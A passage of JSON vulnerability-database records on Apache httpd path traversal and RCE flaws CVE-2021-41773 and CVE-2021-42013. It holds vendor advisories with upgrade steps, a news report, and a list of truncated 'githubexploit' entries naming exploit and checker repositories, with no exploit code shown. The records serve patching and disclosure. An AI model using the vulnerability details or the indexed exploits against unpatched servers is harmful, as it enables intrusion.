-current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.51-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.51-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.51-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T03:27:06", "type": "slackware",
"title": "[slackware-security] httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T03:27:06", "id": "SSA-2021-280-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.483439", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:13", "description": "The Apache Software Foundation on 
Thursday released additional security updates for its HTTP Server product to remediate what it says is an \"incomplete fix\" for an [actively exploited](<https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html>) path traversal and remote code execution flaw that it patched earlier this week.\n\n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>), as the new vulnerability is identified, builds upon [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>), a flaw that impacts Apache web servers running version 2.4.49 and involves a [path normalization](<https://en.wikipedia.org/wiki/URI_normalization>) bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.\n\nAlthough the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the \"mod_cgi\" module was loaded and the configuration \"require all denied\" was absent, prompting Apache to issue another round of emergency updates.\n\n\"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives,\" the company [noted](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) in an advisory. \"If files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\"\n\nThe Apache Software Foundation credited Juan Escobar from Dreamlab Technologies, Fernando Mu\u00f1oz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>) it's \"seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation,\" urging \"organizations to patch immediately if they haven't already.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T04:47:00", "type": "thn", "title": "New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T02:57:44", "id": "THN:A0816B13A402B9865C624E3CA1B06EA5", "href": "https://thehackernews.com/2021/10/new-patch-released-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nThe Apache http server project reports:\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\n\t Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n\t (CVE-2021-42013).\nIt was found that the fix for CVE-2021-41773 in Apache HTTP\n\t Server 2.4.50 was insufficient. An attacker could use a path\n\t traversal attack to map URLs to files outside the directories\n\t configured by Alias-like directives.\nIf files outside of these directories are not protected by the\n\t usual default configuration \"require all denied\", these requests\n\t can succeed. 
If CGI scripts are also enabled for these aliased\n\t paths, this could allow for remote code execution.\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n\t earlier versions.\nAcknowledgements: Reported by Juan Escobar from Dreamlab\n\t Technologies, Fernando Munoz from NULL Life CTF Team, and\n\t Shungo Kumasaka\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "freebsd", "title": "Apache httpd -- Path Traversal and Remote Code Execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "D001C189-2793-11EC-8FB1-206A8A720317", "href": "https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-11-27T06:38:53", "description": "Arch Linux Security Advisory ASA-202110-1\n=========================================\n\nSeverity: Critical\nDate : 2021-10-21\nCVE-ID : CVE-2021-42013\nPackage : apache\nType : directory traversal\nRemote : Yes\nLink : 
https://security.archlinux.org/AVG-2450\n\nSummary\n=======\n\nThe package apache before version 2.4.51-1 is vulnerable to directory\ntraversal.\n\nResolution\n==========\n\nUpgrade to 2.4.51-1.\n\n# pacman -Syu \"apache>=2.4.51-1\"\n\nThe problem has been fixed upstream in version 2.4.51.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives. If files outside of these directories are not protected by\nthe usual default configuration \"require all denied\", these requests\ncan succeed. If CGI scripts are also enabled for these aliased paths,\nthis could allow for remote code execution. This issue only affects\nApache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nImpact\n======\n\nA remote attacker could trick the HTTP server into executing arbitrary\nexecutables in its file system through path traversal.\n\nReferences\n==========\n\nhttps://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013\nhttps://twitter.com/roman_soft/status/1446252280597078024\nhttps://github.com/icing/blog/blob/main/httpd-2.4.50.md\nhttps://svn.apache.org/viewvc?view=revision&revision=1893971\nhttps://security.archlinux.org/CVE-2021-42013", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:00:00", "type": "archlinux", "title": "[ASA-202110-1] apache: directory traversal", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T00:00:00", "id": "ASA-202110-1", "href": "https://security.archlinux.org/ASA-202110-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-02-01T00:00:00", "description": "# apache httpd path traversal checker\n\n\n## 0x00 \u6982\u8ff0\n\n20211005\uff0c\u7f51\u4e0a\u66dd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T10:38:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], 
"modified": "2022-01-31T07:15:01", "id": "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T20:16:36", "description": "# CVE-2021-41773_CVE-2021-42013\nCVE-2021-41773 CVE-2021-42013\u591a\u7ebf\u7a0b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T03:32:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-30T12:49:14", "id": "B81BC21D-818E-5B33-96D7-062C14102874", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# cve-2021-41773 and cve-2021-42013\n\ncve-2021-41773 \u548c cve-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T11:33:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T06:48:47", "id": "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T20:00:41", "description": " CVE-2021-41773/2021-42013 Mass Vulnerability Ch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T02:12:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-02-20T09:15:02", "id": "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "Apache HTTP Server\n\n What is it?\n -----------\n\n The Apache HT...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T22:02:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T12:52:18", "id": "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T03:12:43", "description": "# CVE-2021-42013\n## Introduction\nIt was found that the fix 
for C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-14T18:00:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T01:22:13", "id": "F41EE867-4E63-5259-9DF0-745881884D04", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:10:15", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T00:56:28", "description": "## RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T17:56:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": 
"2022-03-27T21:52:34", "id": "0C28A0EC-7162-5D73-BEC9-B034F5392847", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T05:28:59", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T04:08:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-03-14T04:20:42", "id": "495E99E5-C1B0-52C1-9218-384D04161BE4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:14:33", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:30", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "0C47BCF2-EA6F-5613-A6E8-B707D64155DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T20:32:50", "description": "# CVE-2021-42013\r\n\r\n## Description\r\n\r\nThis script exploits CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-08T21:48:40", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-23T16:46:10", "id": "C879EE66-6B75-5EC8-AA68-08693C6CCAD1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:23", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": 
